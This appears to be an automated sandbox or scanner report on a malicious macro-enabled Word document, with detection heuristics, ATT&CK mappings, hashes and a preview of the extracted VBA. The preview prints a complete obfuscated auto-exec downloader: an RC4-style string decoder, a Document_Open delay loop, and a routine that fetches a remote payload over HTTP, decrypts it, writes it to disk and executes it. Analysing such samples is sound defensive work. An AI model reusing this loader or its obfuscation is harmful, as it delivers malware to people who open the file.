MALICIOUS
Risk Score: 400
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
The sample is an Office document containing obfuscated VBA macros, specifically an auto-executing loader within the Document_Open subroutine. The document body explicitly instructs the user to "Enable Editing" and "Enable Content", a common lure for macro-based malware. The VBA code uses CreateObject, GetObject, and CallByName, indicative of malicious intent to execute further stages or download payloads. The presence of ClamAV detections further supports its malicious nature.
Heuristics 12
- ClamAV: Doc.Malware.Chronos-6897935-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA project inside OOXML [medium, 7 related findings] OOXML_VBA
  Document contains a VBA project — VBA macros present
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: GetObject 94, 55
- CreateObject call [high] OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script: CreateObject "XrKkzVPg7WvjRO", "ChMD3qE"
- GetObject call [high] OLE_VBA_GETOBJ
  GetObject call
  Matched line in script: GetObject 94, 55
- CallByName call [high] OLE_VBA_CALLBYNAME
  CallByName call
  Matched line in script: CallByName SlA8nZgzeK, 77, VbMethod, 61, 9, 38
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script: Sub Document_Open()
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script: LP4SQwJbw = Environ(Ugfb44GjbgnITM(Chr(224) + Chr(205) + Chr(217) + Chr(83) + Chr(26) + Chr(234) + Chr(6), "CbZtV")) & "\" & SHNVp83fxC & Ugfb44GjbgnITM(Chr(161) + Chr(178) + Chr(158) + Chr(123), "XFko3qKMI3uDE")
- Macro/content-enable lure [medium] SE_ENABLE_LURE
  Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12501 bytes |

SHA-256: 7fffee522239fc0727c0f3d170ceacffadb887fe9a2aee52858a9c825628858e

Detection
ClamAV: No threats found
Obfuscation or payload: likely
105 of 172 identifiers look randomly generated (e.g. 'IGjZD2hzAklRRmRHV') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub YSKjArzQKIEy6qelk()
Dim VTn8hvSOK0Vj As Long, Ndttlvn3uwF As Long
VTn8hvSOK0Vj = 5
Ndttlvn3uwF = 6
If VTn8hvSOK0Vj + Ndttlvn3uwF > 2 Then
Ndttlvn3uwF = VTn8hvSOK0Vj + 2
Else
MsgBox 12
End If
Partition 48, 94, 7, 98
T5gcsDb = CVErr(22)
App.StartLogging "PelkE8IUHJuVT", 28
DateDiff "Kqa37CBz", 56, 97
DeleteSetting "G8wtvNJoW9hdIN"
Err.Clear
SyyHN9ynsyTcY3 = CVDate(18)
WeekdayName 37
Round 27, 83
GetSetting 14, 50, 88
DateAdd "Xnzfqwh", 26, 15
Load GrSM
GetObject 94, 55
DateSerial 72, 73, 70
IsError 80
Rate 51, 38, 52
UT72J = Fix(10)
Filter Aj0apnlR8, 10
CreateObject "XrKkzVPg7WvjRO", "ChMD3qE"
ETuHEiyx5gc = LCase(35)
If CDec(34) = True Then HgG97wFGeyirtHsFM = 64
MUlyU7CBz = EOF(71)
CallByName SlA8nZgzeK, 77, VbMethod, 61, 9, 38
URrhntRZE = Dir("JzcENRhjhFAr")
If CDbl(24) = True Then Qyd9EaSrEbaXPD = 93
CUZ0rEFLHU = Cos(10)
Loc 58
FreeFile 63
Stop
Atn 3
Dim IEOG1 As Long, NOVPTwvTJW As Long
IEOG1 = 49
NOVPTwvTJW = 18
If IEOG1 + NOVPTwvTJW > 2 Then
NOVPTwvTJW = IEOG1 + 38
Else
MsgBox 49
End If
End Sub
Sub Document_Open()
Dim YPTwvTJWdagz05aGO As Long, KEADEgz0pLKTi As Long
YPTwvTJWdagz05aGO = 61
KEADEgz0pLKTi = 7
If YPTwvTJWdagz05aGO + KEADEgz0pLKTi > 2 Then
KEADEgz0pLKTi = YPTwvTJWdagz05aGO + 70
Else
MsgBox 27
End If
Dim GWhzWrRztIQ1Suw As Long, TNk8q As Long, IGjZD2hzAklRRmRHV As Long
Dim QxG7LhGZCDXeW0 As Long, USByyLurhl As Long
QxG7LhGZCDXeW0 = 24
USByyLurhl = 73
If QxG7LhGZCDXeW0 + USByyLurhl > 2 Then
USByyLurhl = QxG7LhGZCDXeW0 + 50
Else
MsgBox 45
End If
GWhzWrRztIQ1Suw = 947529939: TNk8q = 0: IGjZD2hzAklRRmRHV = 0
Dim OHZ3 As Long, DAj8l9 As Long
OHZ3 = 26
DAj8l9 = 19
If OHZ3 + DAj8l9 > 2 Then
DAj8l9 = OHZ3 + 86
Else
MsgBox 12
End If
For TNk8q = 1 To GWhzWrRztIQ1Suw
IGjZD2hzAklRRmRHV = IGjZD2hzAklRRmRHV + 1
Next TNk8q
Dim YSPBNrOE2d4V As Long, Dj7D4Fzd13WYD As Long
YSPBNrOE2d4V = 79
Dj7D4Fzd13WYD = 31
If YSPBNrOE2d4V + Dj7D4Fzd13WYD > 2 Then
Dj7D4Fzd13WYD = YSPBNrOE2d4V + 4
Else
MsgBox 34
End If
If IGjZD2hzAklRRmRHV = GWhzWrRztIQ1Suw Then
Dim HIDLQ5cBTJd As Long, XgWpslXor5SaA As Long
HIDLQ5cBTJd = 4
XgWpslXor5SaA = 13
If HIDLQ5cBTJd + XgWpslXor5SaA > 2 Then
XgWpslXor5SaA = HIDLQ5cBTJd + 57
Else
MsgBox 70
End If
KlYQWnBa8vk
Dim XsF9MWK5UfhpyJ As Long, CiHX2Fv7J As Long
XsF9MWK5UfhpyJ = 60
CiHX2Fv7J = 64
If XsF9MWK5UfhpyJ + CiHX2Fv7J > 2 Then
CiHX2Fv7J = XsF9MWK5UfhpyJ + 4
Else
MsgBox 59
End If
Else
Dim CcPsN6Bsrqclp As Long, Gx8youk3 As Long
CcPsN6Bsrqclp = 57
Gx8youk3 = 70
If CcPsN6Bsrqclp + Gx8youk3 > 2 Then
Gx8youk3 = CcPsN6Bsrqclp + 84
Else
MsgBox 43
End If
YSKjArzQKIEy6qelk
Dim O2eRpHFs2GPz As Long, WFDRZBcM7ble As Long
O2eRpHFs2GPz = 66
WFDRZBcM7ble = 63
If O2eRpHFs2GPz + WFDRZBcM7ble > 2 Then
WFDRZBcM7ble = O2eRpHFs2GPz + 73
Else
MsgBox 44
End If
End If
Dim HiJWpaWWkHAX As Long, TJ8XZHSvjA As Long
HiJWpaWWkHAX = 30
TJ8XZHSvjA = 27
If HiJWpaWWkHAX + TJ8XZHSvjA > 2 Then
TJ8XZHSvjA = HiJWpaWWkHAX + 36
Else
MsgBox 8
End If
End Sub
Function SHNVp83fxC() As String
Dim PsYglGuESKnKj9y As Long, GRjnF7SGI2kUW As Long
PsYglGuESKnKj9y = 2
GRjnF7SGI2kUW = 57
If PsYglGuESKnKj9y + GRjnF7SGI2kUW > 2 Then
GRjnF7SGI2kUW = PsYglGuESKnKj9y + 17
Else
MsgBox 13
End If
Dim HXXWT() As Byte, QyMMZ3F() As Byte, MXRgTGQW8MLsW As Long, JNRunBywPevFJ As Long, BK4eM8T As String, BmXGJtfjfhlHzmbml As String, EeVv As Long
Dim Xd4NyZliu As Long, RLqyyJvBDjxTn As Long
Xd4NyZliu = 23
RLqyyJvBDjxTn = 21
If Xd4NyZliu + RLqyyJvBDjxTn > 2 Then
RLqyyJvBDjxTn = Xd4NyZliu + 52
Else
MsgBox 59
End If
EeVv = 0
Dim L42rPCpp82 As Long, VA6UHmbgbERya As Long
L42rPCpp82 = 51
VA6UHmbgbERya = 90
If L42rPCpp82 + VA6UHmbgbERya > 2 Then
VA6UHmbgbERya = L42rPCpp82 + 45
Else
MsgBox 54
End If
V7IAjrXK:
Dim MOiZSmS As Long, V9GRYn6v59UFOg As Long
MOiZSmS = 28
V9GRYn6v59UFOg = 19
If MOiZSmS + V9GRYn6v59UFOg > 2 Then
V9GRYn6v59UFOg = MOiZSmS + 20
Else
MsgBox 17
End If
Randomize
BmXGJtfjfhlHzmbml = Int(30 * Rnd)
If BmXGJtfjfhlHzmbml < 4 Then GoTo V7IAjrXK
EeVv = BmXGJtfjfhlHzmbml
If EeVv > 0& Then
Dim E3XwpmDeDSOM75r As Long, B3dv9q2l As Long
E3XwpmDeDSOM75r = 37
B3dv9q2l = 65
If E3XwpmDeDSOM75r + B3dv9q2l > 2 Then
B3dv9q2l = E3XwpmDeDSOM75r + 7
Else
MsgBox 9
End If
BK4eM8T = Ugfb44GjbgnITM(Chr(205) + Chr(245) + Chr(38) + Chr(53) + Chr(72) + Chr(243) + Chr(199) + Chr(103) + Chr(137) + Chr(103), "QnXhmkThT4uA")
Randomize
HXXWT = BK4eM8T
MXRgTGQW8MLsW = Len(BK4eM8T) - 1&
EeVv = (EeVv * 2&) - 1&
ReDim QyMMZ3F(EeVv) As Byte
Dim CpC4vZwBQ6iKo As Long, ReLbv9cdUfZSmS As Long
CpC4vZwBQ6iKo = 17
ReLbv9cdUfZSmS = 5
If CpC4vZwBQ6iKo + ReLbv9cdUfZSmS > 2 Then
ReLbv9cdUfZSmS = CpC4vZwBQ6iKo + 40
Else
MsgBox 8
End If
For JNRunBywPevFJ = 0& To EeVv Step 2&
QyMMZ3F(JNRunBywPevFJ) = HXXWT(CLng(MXRgTGQW8MLsW * Rnd) * 2&)
Next
Dim SLxmGur As Long, XDFMEd As Long
SLxmGur = 55
XDFMEd = 63
If SLxmGur + XDFMEd > 2 Then
XDFMEd = SLxmGur + 13
Else
MsgBox 63
End If
End If
Dim GSYMn9Xh5V As Long, RZKdvdCjRO0d As Long
GSYMn9Xh5V = 69
RZKdvdCjRO0d = 93
If GSYMn9Xh5V + RZKdvdCjRO0d > 2 Then
RZKdvdCjRO0d = GSYMn9Xh5V + 48
Else
MsgBox 85
End If
SHNVp83fxC = QyMMZ3F
Dim N6uCBnfiOi As Long, K0Gfn9GRYn6v As Long
N6uCBnfiOi = 75
K0Gfn9GRYn6v = 2
If N6uCBnfiOi + K0Gfn9GRYn6v > 2 Then
K0Gfn9GRYn6v = N6uCBnfiOi + 22
Else
MsgBox 62
End If
End Function
Sub WcQVFsK4DL9(Ue92QqKH32 As Long)
Dim Ov45f9QCzP As Long, DdFcbGclryn As Long
Ov45f9QCzP = 50
DdFcbGclryn = 85
If Ov45f9QCzP + DdFcbGclryn > 2 Then
DdFcbGclryn = Ov45f9QCzP + 25
Else
MsgBox 61
End If
Dim DMhDljxVsr6 As Long
Dim QgVteO4TNt As Long, EvpbKhGgq6EU As Long
QgVteO4TNt = 27
EvpbKhGgq6EU = 55
If QgVteO4TNt + EvpbKhGgq6EU > 2 Then
EvpbKhGgq6EU = QgVteO4TNt + 69
Else
MsgBox 72
End If
DMhDljxVsr6 = Timer + Ue92QqKH32
Do While Timer < DMhDljxVsr6
DoEvents
Loop
Dim RAoBrQ5Q6g As Long, JBStUw4ctHHYgZR As Long
RAoBrQ5Q6g = 77
JBStUw4ctHHYgZR = 50
If RAoBrQ5Q6g + JBStUw4ctHHYgZR > 2 Then
JBStUw4ctHHYgZR = RAoBrQ5Q6g + 58
Else
MsgBox 8
End If
End Sub
Function Ugfb44GjbgnITM(ByVal MaccjxK As String, ByVal HcFB8mRvWJ9Ciu As String) As String
Dim MRKNJMVMOAD9 As Long, Iprxm0REljpGg As Long
MRKNJMVMOAD9 = 43
Iprxm0REljpGg = 80
If MRKNJMVMOAD9 + Iprxm0REljpGg > 2 Then
Iprxm0REljpGg = MRKNJMVMOAD9 + 40
Else
MsgBox 86
End If
On Error Resume Next
Dim PTwVZ As Long, Nd2e1Ula7htA As Long
PTwVZ = 73
Nd2e1Ula7htA = 15
If PTwVZ + Nd2e1Ula7htA > 2 Then
Nd2e1Ula7htA = PTwVZ + 62
Else
MsgBox 47
End If
Dim L8AKZD66bB7W(0 To 255) As Integer, Hm7oMkeRV As Long, YX0g As Long, MQQsLu1BTX8Dq0 As Long, NorVJ9d9lb() As Byte, PwLiyYVTCJ9HNF() As Byte, TSGZbCtxIO As Byte
Dim Nprid As Long, Qr8I As Long
Nprid = 20
Qr8I = 74
If Nprid + Qr8I > 2 Then
Qr8I = Nprid + 12
Else
MsgBox 72
End If
NorVJ9d9lb() = StrConv(HcFB8mRvWJ9Ciu, vbFromUnicode)
Dim Xi24xWccgR As Long, Y6cVvfr As Long
Xi24xWccgR = 94
Y6cVvfr = 98
If Xi24xWccgR + Y6cVvfr > 2 Then
Y6cVvfr = Xi24xWccgR + 38
Else
MsgBox 93
End If
For Hm7oMkeRV = 0 To 255
L8AKZD66bB7W(Hm7oMkeRV) = Hm7oMkeRV
Next Hm7oMkeRV
Hm7oMkeRV = 0
YX0g = 0
MQQsLu1BTX8Dq0 = 0
For Hm7oMkeRV = 0 To 255
YX0g = (YX0g + L8AKZD66bB7W(Hm7oMkeRV) + NorVJ9d9lb(Hm7oMkeRV Mod Len(HcFB8mRvWJ9Ciu))) Mod 256
TSGZbCtxIO = L8AKZD66bB7W(Hm7oMkeRV)
L8AKZD66bB7W(Hm7oMkeRV) = L8AKZD66bB7W(YX0g)
L8AKZD66bB7W(YX0g) = TSGZbCtxIO
Next Hm7oMkeRV
Hm7oMkeRV = 0
YX0g = 0
MQQsLu1BTX8Dq0 = 0
PwLiyYVTCJ9HNF() = StrConv(MaccjxK, vbFromUnicode)
For Hm7oMkeRV = 0 To Len(MaccjxK)
YX0g = (YX0g + 1) Mod 256
MQQsLu1BTX8Dq0 = (MQQsLu1BTX8Dq0 + L8AKZD66bB7W(YX0g)) Mod 256
TSGZbCtxIO = L8AKZD66bB7W(YX0g)
L8AKZD66bB7W(YX0g) = L8AKZD66bB7W(MQQsLu1BTX8Dq0)
L8AKZD66bB7W(MQQsLu1BTX8Dq0) = TSGZbCtxIO
PwLiyYVTCJ9HNF(Hm7oMkeRV) = PwLiyYVTCJ9HNF(Hm7oMkeRV) Xor (L8AKZD66bB7W((L8AKZD66bB7W(YX0g) + L8AKZD66bB7W(MQQsLu1BTX8Dq0)) Mod 256))
Next Hm7oMkeRV
Dim TnpwPGwRjCSzhei As Long, LwB0XsJCZI056VSq As Long
TnpwPGwRjCSzhei = 38
LwB0XsJCZI056VSq = 40
If TnpwPGwRjCSzhei + LwB0XsJCZI056VSq > 2 Then
LwB0XsJCZI056VSq = TnpwPGwRjCSzhei + 81
Else
MsgBox 83
End If
Ugfb44GjbgnITM = StrConv(PwLiyYVTCJ9HNF, vbUnicode)
Dim MsA2YLZo As Long, XVT6XWFinHD As Long
MsA2YLZo = 8
XVT6XWFinHD = 56
If MsA2YLZo + XVT6XWFinHD > 2 Then
XVT6XWFinHD = MsA2YLZo + 85
Else
MsgBox 71
End If
End Function
Sub KlYQWnBa8vk()
Dim IgKZXvS7rAVn As Long, FOyT As Long
IgKZXvS7rAVn = 24
FOyT = 8
If IgKZXvS7rAVn + FOyT > 2 Then
FOyT = IgKZXvS7rAVn + 56
Else
MsgBox 85
End If
Dim LP4SQwJbw As String, JgtjuQb As Object, H41FjQt0I8 As Integer
Dim J4lCrIB59O As Long, B7GbPyC9Qrg3q As Long
J4lCrIB59O = 42
B7GbPyC9Qrg3q = 29
If J4lCrIB59O + B7GbPyC9Qrg3q > 2 Then
B7GbPyC9Qrg3q = J4lCrIB59O + 65
Else
MsgBox 4
End If
LP4SQwJbw = Environ(Ugfb44GjbgnITM(Chr(224) + Chr(205) + Chr(217) + Chr(83) + Chr(26) + Chr(234) + Chr(6), "CbZtV")) & "\" & SHNVp83fxC & Ugfb44GjbgnITM(Chr(161) + Chr(178) + Chr(158) + Chr(123), "XFko3qKMI3uDE")
Dim WxAqKxyuYH As Long, C9mBVgbjoyQjW As Long
WxAqKxyuYH = 4
C9mBVgbjoyQjW = 17
If WxAqKxyuYH + C9mBVgbjoyQjW > 2 Then
C9mBVgbjoyQjW = WxAqKxyuYH + 30
Else
MsgBox 62
End If
Set JgtjuQb = CreateObject(Ugfb44GjbgnITM(Chr(56) + Chr(59) + Chr(153) + Chr(193) + Chr(178) + Chr(33) + Chr(191) + Chr(112) + Chr(71) + Chr(192) + Chr(48) + Chr(120) + Chr(194) + Chr(231) + Chr(138) + Chr(247) + Chr(132), "MAl0HT5gx"))
Dim TG7GbPy As Long, NtkLhASiKWFrec7 As Long
TG7GbPy = 85
NtkLhASiKWFrec7 = 95
If TG7GbPy + NtkLhASiKWFrec7 > 2 Then
NtkLhASiKWFrec7 = TG7GbPy + 66
Else
MsgBox 53
End If
JgtjuQb.Open Ugfb44GjbgnITM(Chr(224) + Chr(119) + Chr(225), "W72TYHcku5Pv9g9Pm"), Ugfb44GjbgnITM(Chr(62) + Chr(63) + Chr(189) + Chr(157) + Chr(205) + Chr(19) + Chr(97) + Chr(199) + Chr(190) + Chr(137) + Chr(163) + Chr(49) + Chr(5) + Chr(141) + Chr(148) + Chr(199) + Chr(169) + Chr(171) + Chr(161) + Chr(249) + Chr(131) + Chr(38) + Chr(88) + Chr(31) + Chr(61) + Chr(26) + Chr(23), "PlffXCe"), False
Dim Og3CQS8xQE As Long, YLP As Long
Og3CQS8xQE = 83
YLP = 61
If Og3CQS8xQE + YLP > 2 Then
YLP = Og3CQS8xQE + 56
Else
MsgBox 44
End If
JgtjuQb.setRequestHeader Ugfb44GjbgnITM(Chr(77) + Chr(148) + Chr(119) + Chr(87) + Chr(252) + Chr(95) + Chr(39) + Chr(79) + Chr(241) + Chr(190), "DzgPQfGyYkNZdgEBY"), Ugfb44GjbgnITM(Chr(57) + Chr(104) + Chr(4) + Chr(89) + Chr(185) + Chr(105) + Chr(22) + Chr(60) + Chr(236) + Chr(114) + Chr(96), "WJln2tRjbC9Qrg3q")
JgtjuQb.send
If JgtjuQb.readyState = 4 And JgtjuQb.Status = 200 Then
Dim W75DbYLrvN As Long, PmurfHXxmH As Long
W75DbYLrvN = 62
PmurfHXxmH = 25
If W75DbYLrvN + PmurfHXxmH > 2 Then
PmurfHXxmH = W75DbYLrvN + 64
Else
MsgBox 74
End If
H41FjQt0I8 = FreeFile
Open LP4SQwJbw For Binary Access Write Lock Write As #H41FjQt0I8
Put #H41FjQt0I8, , Ugfb44GjbgnITM(StrConv(JgtjuQb.ResponseBody, vbUnicode), Ugfb44GjbgnITM(Chr(51) + Chr(37) + Chr(27) + Chr(191) + Chr(199) + Chr(79) + Chr(147) + Chr(169) + Chr(107), "O0eFDO"))
Close #H41FjQt0I8
Dim ABKKQOTEh2vzNL As Long, WdYnXfABwyefmrX As Long
ABKKQOTEh2vzNL = 91
WdYnXfABwyefmrX = 39
If ABKKQOTEh2vzNL + WdYnXfABwyefmrX > 2 Then
WdYnXfABwyefmrX = ABKKQOTEh2vzNL + 50
Else
MsgBox 42
End If
WcQVFsK4DL9 1
Dim QzUrPl20C42VPX As Long, Umojeac95 As Long
QzUrPl20C42VPX = 86
Umojeac95 = 55
If QzUrPl20C42VPX + Umojeac95 > 2 Then
Umojeac95 = QzUrPl20C42VPX + 75
Else
MsgBox 86
End If
CreateObject(Ugfb44GjbgnITM(Chr(255) + Chr(151) + Chr(243) + Chr(155) + Chr(224) + Chr(93) + Chr(246) + Chr(167) + Chr(65) + Chr(196) + Chr(166) + Chr(124) + Chr(209), "IW7pA2Du4A1IyqHjJ")).exec """" & LP4SQwJbw & """"
Dim OQKuxKteCVA As Long, Kigkq4bIX9UdAIfTn As Long
OQKuxKteCVA = 92
Kigkq4bIX9UdAIfTn = 35
If OQKuxKteCVA + Kigkq4bIX9UdAIfTn > 2 Then
Kigkq4bIX9UdAIfTn = OQKuxKteCVA + 59
Else
MsgBox 87
End If
End If
Dim SXOPF5qMPjl As Long, BKn1OVeUP As Long
SXOPF5qMPjl = 76
BKn1OVeUP = 69
If SXOPF5qMPjl + BKn1OVeUP > 2 Then
BKn1OVeUP = SXOPF5qMPjl + 91
Else
MsgBox 97
End If
Set JgtjuQb = Nothing
Dim QxYM3vr68t4 As Long, S2RmGcL9W As Long
QxYM3vr68t4 = 21
S2RmGcL9W = 55
If QxYM3vr68t4 + S2RmGcL9W > 2 Then
S2RmGcL9W = QxYM3vr68t4 + 6
Else
MsgBox 56
End If
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 32768 bytes |

SHA-256: a804ab787b7b760818596b22d39a80995ac20f9ba484a675f46f5f63d9c77264

Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
205 of 350 identifiers look randomly generated (e.g. 'DFDD2508DB38BE3CBE3CBE3CBE3C') — consistent with name-mangling obfuscation.